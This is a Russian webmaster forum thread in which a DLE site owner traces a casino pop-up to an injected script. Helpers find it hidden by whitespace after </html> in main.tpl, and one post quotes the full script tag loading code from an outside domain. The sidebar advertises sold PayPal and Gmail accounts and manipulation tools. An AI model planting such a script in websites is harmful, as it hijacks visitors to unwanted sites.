Войти

Войти | Регистрация
Поиск по сайту
Как найти шпиона на сайте
Поиск  Правила 
Seo форум » Разработка сайтов » CMS » DLE
Страницы: 1
Как найти шпиона на сайте, Взломали сайт на DLE 10.2
#1
26 Января 2017 14:05
Сайт был взломан, причем, обнаружил только взлом админки, глубже не рыл. Доступ восстановил, больше в админпалели никто не роется, но проблема осталась.Куда-то запихнули шпиона и теперь при клике мышкой открывается второе окно с сайтом про какое-то казино.  

Движок DLE ставили спецы с хостинга сами (они нет-нет предлагают обновиться бесплатно), я ничего не менял. Всегда работало хорошо, только после взлома осталась одна проблема.

Подскажите, где искать гадский код?
Изменено: Юрий Д - 26 Января 2017 14:06
"ПисАть, как и пИсать, нужно, когда уже не можешь" М.М. Жванецкий.

Награды СССР
#2
26 Января 2017 19:42
Цитата
Юрий Д пишет:
Сайт был взломан, причем, обнаружил только взлом админки, глубже не рыл. Доступ восстановил, больше в админпалели никто не роется, но проблема осталась.Куда-то запихнули шпиона и теперь при клике мышкой открывается второе окно с сайтом про какое-то казино.

Движок DLE ставили спецы с хостинга сами (они нет-нет предлагают обновиться бесплатно), я ничего не менял. Всегда работало хорошо, только после взлома осталась одна проблема.

Подскажите, где искать гадский код?
Сделайте откат
(НЕЙРОСЕТЬ) Качественные живые посетители на ваш сайт, блог, канал — Бесплатно!!!

ЛУЧШИЙ ПРОВЕРЕННЫЙ и САМЫЙ НЕДОРОГОЙ ХОСТИНГ: АКЦИИ!
#3
27 Января 2017 13:02
WGN, откат, не получается, те бэкапы, которые сохранились, все уже с вредоносным кодом...

Поискал шпиона методом тыка: при замене файла main.tpl в шаблонах на чистый файл из дистрибутива, проблема исчезает - получается, что код в нём.
Но вот, найти не смог... Перерыл весь файл, ничего подозрительного не нашел.

Как хоть он должен выглядеть? Может кто-нибудь пример покажет?
#4
27 Января 2017 13:17
можно адрес сайта?
#5
27 Января 2017 13:34
vik1105, адрес у меня в подписи, нижний
#6
27 Января 2017 13:52
в самом низу после </html> что это за скрипт? если не Ваш, то это он.
#7
27 Января 2017 13:58
Цитата
<script async language="javascript" charset="UTF-8" type="text/javascript" src="rohlita.ru/6xj87m86pzm80kdafh1kb96pn3lgyehco6puieccrnf990zunmuv76h?6b42bbis=aDcbi ( rohlita.ru/6xj87m86pzm80kdafh1kb96pn3lgyehco6puieccrnf990zunmuv76h?6b42bbis=aDcbi )"></script>
#8
27 Января 2017 13:58
vik1105, да, похоже, что это он и есть...
Изменено: Юрий Д - 27 Января 2017 13:59
#9
27 Января 2017 14:05
удалите этот скрипт, и поставьте на будущее antishell.ru/]AntiShell Скрипт он будет контролировать все действия на сайте.
#10
27 Января 2017 14:15
Всё, проблема устранена! ))) Код был замаскирован большим количеством пробелов. поэтому в окне редактирования и не был виден.
Всем огромное спасибо за помощь! Отдельный респект vik1105!
#11
23 Февраля 2017 15:12
Этой маскировке три тысячи лет, но до сих пор работает )
Проект Снайпер Арена и Спортивный клуб
#12
23 Февраля 2017 17:11
Цитата
Юрий Д пишет:
Всё, проблема устранена!
возможно ненадолго, советую сменить все пароли от сайтов и хостинга проверить комп на троянов, могут заливать на хостинге
Шаблоны сайтов

Биржа постоянных ссылок!

Качественный хостинг!
 
Страницы: 1
Похожие темы:
  13.01.2019 15:55  Помогите найти чат для DLE 13
  10.09.2018 23:27  Как найти код вызова рекламы в шаблоне?
  09.10.2016 09:57  Помогите найти хороший модуль интернет магазина
  05.09.2016 02:33  Помогите найти
  19.02.2014 03:57  Помогите найти шаблон
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
15:08 Стоит ли добавлять сайт в Rambler топ 100? 
12:59 Absence в Армении 
19:29 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
17:29 Как продвигать сайт с неуникальным контентом 
14:50 Индексация страниц 
12:36 У кого новостник, дайте пару советов плиз 
13:53 AviTool - мощный инструмент для автоматизации работы с Avito 
14:01 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
13:15 SOCKS5 приватные прокси на 30 дней для PayPal 
13:14 Google Voice аккаунты для бесплатных SMS и звонков 
13:13 PayPal аккаунты для любых целей 
13:11  
13:03 swapsfera.com 
12:19 AVTtool — программа для накрутки поведенческих факторов на Avito 
15:11 Ну что, кто куда деваете свои сайты? 
15:07 Добро пожаловать в цифровой мир... 
19:42 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
22:08 Накрутка поисковых подсказок 
05:04 Точные прогнозы на футбол 
14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.11.2023 (602 дня назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 01.04.2025 (107 дней назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
Интересные темы
—  Баннерообменная бизнес сеть. Заработок без вложений.
—  Гайд: Как лить на онлайн-беттинг и гемблинг в Аргентине
—  Монетизация любого типа контента на YouTube. Adsense больше не нужен!
—  Ютуб - продвижение и заработок
—  Новая акция 2025: Заработай* до 5 432 руб. за пару минут** просто, бесплатно и без смс. Сможет даже новичок


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050